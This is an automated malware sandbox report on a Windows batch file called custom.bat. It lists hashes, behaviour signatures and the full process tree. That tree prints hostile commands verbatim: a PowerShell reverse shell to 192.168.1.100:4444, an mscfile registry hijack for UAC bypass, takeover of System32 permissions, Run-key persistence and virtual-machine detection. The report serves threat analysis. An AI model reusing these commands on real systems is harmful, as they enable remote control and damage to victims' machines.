Windows 7 deprecation
Windows 7 will be removed from tria.ge on 2025-03-31
Analysis
-
max time kernel
139s -
max time network
142s -
platform
windows11-21h2_x64 -
resource
win11-20240802-en -
resource tags
arch:x64arch:x86image:win11-20240802-enlocale:en-usos:windows11-21h2-x64system -
submitted
08/09/2024, 06:47
Static task
static1
Behavioral task
behavioral1
Sample
custom.bat
Resource
win10-20240404-en
Behavioral task
behavioral2
Sample
custom.bat
Resource
win7-20240903-en
Behavioral task
behavioral3
Sample
custom.bat
Resource
win10v2004-20240802-en
Behavioral task
behavioral4
Sample
custom.bat
Resource
win11-20240802-en
General
-
Target
custom.bat
-
Size
4KB
-
MD5
1c63745d54962d205bb3ae879bea1ed4
-
SHA1
a832c894a4e2b6d486c48b9ea6ec79d94df9537e
-
SHA256
396ea933ebc00327d2ea983206ccd2a832999c28a7df070000fe9874890b5a0e
-
SHA512
129d73d0fd5967b232c54d50bc94ed171dd2ee5da2222b18bd350b42808799575a3a726c7b0b46b65d2717d025b9ebeb424a834f42540daf8308be3171a4af39
-
SSDEEP
96:NQN1Vh0eAwx86mwCVHVsOvx8vXSu7eQ/GdZj/BawH6im7BFVPhGHixL:NOueA8CVHiOvx8vC0emG7LBawH6/Yix
Malware Config
Signatures
-
Possible privilege escalation attempt 4 IoCs
pid Process 3100 takeown.exe 4520 takeown.exe 1196 icacls.exe 3596 icacls.exe -
Modifies file permissions 1 TTPs 4 IoCs
pid Process 1196 icacls.exe 3596 icacls.exe 3100 takeown.exe 4520 takeown.exe -
Adds Run key to start application 2 TTPs 1 IoCs
description ioc Process Set value (str) \REGISTRY\USER\S-1-5-21-6179872-1886041298-1573312864-1000\Software\Microsoft\Windows\CurrentVersion\Run\TotalDestruction = "C:\\Users\\Admin\\AppData\\Local\\Temp\\custom.bat" reg.exe -
pid Process 4840 powershell.exe 2304 powershell.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Delays execution with timeout.exe 2 IoCs
pid Process 728 timeout.exe 2860 timeout.exe -
Gathers system information 1 TTPs 3 IoCs
Runs systeminfo.exe.
pid Process 920 systeminfo.exe 4796 systeminfo.exe 2912 systeminfo.exe -
Modifies registry class 10 IoCs
description ioc Process Key deleted \REGISTRY\USER\S-1-5-21-6179872-1886041298-1573312864-1000_Classes\mscfile reg.exe Key created \REGISTRY\USER\S-1-5-21-6179872-1886041298-1573312864-1000_Classes\mscfile\shell\open reg.exe Key deleted \REGISTRY\USER\S-1-5-21-6179872-1886041298-1573312864-1000_Classes\mscfile\shell\open\command reg.exe Key deleted \REGISTRY\USER\S-1-5-21-6179872-1886041298-1573312864-1000_Classes\mscfile\shell\open reg.exe Set value (str) \REGISTRY\USER\S-1-5-21-6179872-1886041298-1573312864-1000_Classes\mscfile\shell\open\command\ = "C:\\Users\\Admin\\AppData\\Local\\Temp\\full_destruction.bat" reg.exe Key created \REGISTRY\USER\S-1-5-21-6179872-1886041298-1573312864-1000_Classes\Local Settings cmd.exe Key deleted \REGISTRY\USER\S-1-5-21-6179872-1886041298-1573312864-1000_Classes\mscfile\shell reg.exe Key created \REGISTRY\USER\S-1-5-21-6179872-1886041298-1573312864-1000_Classes\mscfile\shell\open\command reg.exe Key created \REGISTRY\USER\S-1-5-21-6179872-1886041298-1573312864-1000_Classes\mscfile reg.exe Key created \REGISTRY\USER\S-1-5-21-6179872-1886041298-1573312864-1000_Classes\mscfile\shell reg.exe -
Suspicious behavior: EnumeratesProcesses 4 IoCs
pid Process 4840 powershell.exe 4840 powershell.exe 2304 powershell.exe 2304 powershell.exe -
Suspicious use of AdjustPrivilegeToken 4 IoCs
description pid Process Token: SeDebugPrivilege 4840 powershell.exe Token: SeTakeOwnershipPrivilege 3100 takeown.exe Token: SeDebugPrivilege 2304 powershell.exe Token: SeTakeOwnershipPrivilege 4520 takeown.exe -
Suspicious use of WriteProcessMemory 34 IoCs
description pid Process procid_target PID 1876 wrote to memory of 3236 1876 cmd.exe 79 PID 1876 wrote to memory of 3236 1876 cmd.exe 79 PID 1876 wrote to memory of 4840 1876 cmd.exe 80 PID 1876 wrote to memory of 4840 1876 cmd.exe 80 PID 1876 wrote to memory of 728 1876 cmd.exe 81 PID 1876 wrote to memory of 728 1876 cmd.exe 81 PID 1876 wrote to memory of 2740 1876 cmd.exe 82 PID 1876 wrote to memory of 2740 1876 cmd.exe 82 PID 1876 wrote to memory of 624 1876 cmd.exe 83 PID 1876 wrote to memory of 624 1876 cmd.exe 83 PID 1876 wrote to memory of 2860 1876 cmd.exe 87 PID 1876 wrote to memory of 2860 1876 cmd.exe 87 PID 624 wrote to memory of 3100 624 cmd.exe 88 PID 624 wrote to memory of 3100 624 cmd.exe 88 PID 1876 wrote to memory of 3196 1876 cmd.exe 89 PID 1876 wrote to memory of 3196 1876 cmd.exe 89 PID 1876 wrote to memory of 4796 1876 cmd.exe 90 PID 1876 wrote to memory of 4796 1876 cmd.exe 90 PID 1876 wrote to memory of 2184 1876 cmd.exe 91 PID 1876 wrote to memory of 2184 1876 cmd.exe 91 PID 1876 wrote to memory of 2912 1876 cmd.exe 94 PID 1876 wrote to memory of 2912 1876 cmd.exe 94 PID 1876 wrote to memory of 1016 1876 cmd.exe 95 PID 1876 wrote to memory of 1016 1876 cmd.exe 95 PID 1876 wrote to memory of 920 1876 cmd.exe 96 PID 1876 wrote to memory of 920 1876 cmd.exe 96 PID 1876 wrote to memory of 1160 1876 cmd.exe 97 PID 1876 wrote to memory of 1160 1876 cmd.exe 97 PID 1876 wrote to memory of 2304 1876 cmd.exe 98 PID 1876 wrote to memory of 2304 1876 cmd.exe 98 PID 1876 wrote to memory of 4948 1876 cmd.exe 99 PID 1876 wrote to memory of 4948 1876 cmd.exe 99 PID 1876 wrote to memory of 4520 1876 cmd.exe 100 PID 1876 wrote to memory of 4520 1876 cmd.exe 100
Processes
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\custom.bat"1⤵
- Modifies registry class
- Suspicious use of WriteProcessMemory
PID:1876 -
C:\Windows\system32\mode.commode con: cols=800 lines=602⤵PID:3236
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "$wshell = New-Object -ComObject wscript.shell; $wshell.SendKeys('{F11}')"2⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4840
-
-
C:\Windows\system32\timeout.exetimeout /t 52⤵
- Delays execution with timeout.exe
PID:728
-
-
C:\Windows\system32\reg.exereg add "HKCU\Software\Classes\mscfile\shell\open\command" /d "C:\Users\Admin\AppData\Local\Temp\full_destruction.bat" /f2⤵
- Modifies registry class
PID:2740
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\full_destruction.bat" "2⤵
- Suspicious use of WriteProcessMemory
PID:624 -
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\* /r /d y3⤵
- Possible privilege escalation attempt
- Modifies file permissions
- Suspicious use of AdjustPrivilegeToken
PID:3100
-
-
C:\Windows\system32\icacls.exeicacls C:\Windows\System32\* /grant Admin:F /t /c3⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:1196
-
-
-
C:\Windows\system32\timeout.exetimeout /t 52⤵
- Delays execution with timeout.exe
PID:2860
-
-
C:\Windows\system32\reg.exereg delete "HKCU\Software\Classes\mscfile" /f2⤵
- Modifies registry class
PID:3196
-
-
C:\Windows\system32\systeminfo.exesysteminfo2⤵
- Gathers system information
PID:4796
-
-
C:\Windows\system32\findstr.exefindstr /i "VirtualBox"2⤵PID:2184
-
-
C:\Windows\system32\systeminfo.exesysteminfo2⤵
- Gathers system information
PID:2912
-
-
C:\Windows\system32\findstr.exefindstr /i "VMware"2⤵PID:1016
-
-
C:\Windows\system32\systeminfo.exesysteminfo2⤵
- Gathers system information
PID:920
-
-
C:\Windows\system32\findstr.exefindstr /i "Hyper-V"2⤵PID:1160
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "$client = New-Object System.Net.Sockets.TCPClient('192.168.1.100', 4444); $stream = $client.GetStream(); [byte[]]$bytes = 0..65535|:ASCII).GetBytes($sendback2); $stream.Write($sendbyte,0,$sendbyte.Length); $stream.Flush()}; $client.Close()"2⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2304
-
-
C:\Windows\system32\reg.exereg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "TotalDestruction" /d "C:\Users\Admin\AppData\Local\Temp\custom.bat" /f2⤵
- Adds Run key to start application
PID:4948
-
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\* /r /d y2⤵
- Possible privilege escalation attempt
- Modifies file permissions
- Suspicious use of AdjustPrivilegeToken
PID:4520
-
-
C:\Windows\system32\icacls.exeicacls C:\Windows\System32\* /grant Admin:F /t /c2⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:3596
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
2KB
MD55f4c933102a824f41e258078e34165a7
SHA1d2f9e997b2465d3ae7d91dad8d99b77a2332b6ee
SHA256d69b7d84970cb04cd069299fd8aa9cef8394999588bead979104dc3cb743b4f2
SHA512a7556b2be1a69dbc1f7ff4c1c25581a28cb885c7e1116632c535fee5facaa99067bcead8f02499980f1d999810157d0fc2f9e45c200dee7d379907ef98a6f034
-
Filesize
1KB
MD5d405540758f0f5bdaab94f1a054cc67d
SHA107e307420a26d17c2dc1226af6e72018da4ae26c
SHA2562ad4d5239f9647362dc68a96eae37de27bdd40359126715c72d79770d3d75d61
SHA51259496f3ae411c3eda1f20335249fa6635cba06974f07b16a181271708a0d5dd078f50ef349e98e4b53643588eb77f4c56c8e2c7fb51a5c638273009ed1b7b889
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
-
Filesize
285B
MD54577f08330df24a350ff523ec87bf38e
SHA15bd1a1b1b8ca3b007102a75f7abaf72348955cf2
SHA2565ef497b0848b259cbfdeb4057846d9a0f3907ec77aabe44219462ac6160bacae
SHA512ed614d6c11981ac9b1aaee0455f4d1b07dce08c0e04fb9f78ad3a7c57db0ecd8e9e0fe21292e599b4963acc8bb66e8db88759fd5fd5fee94df4d3f75cab736c2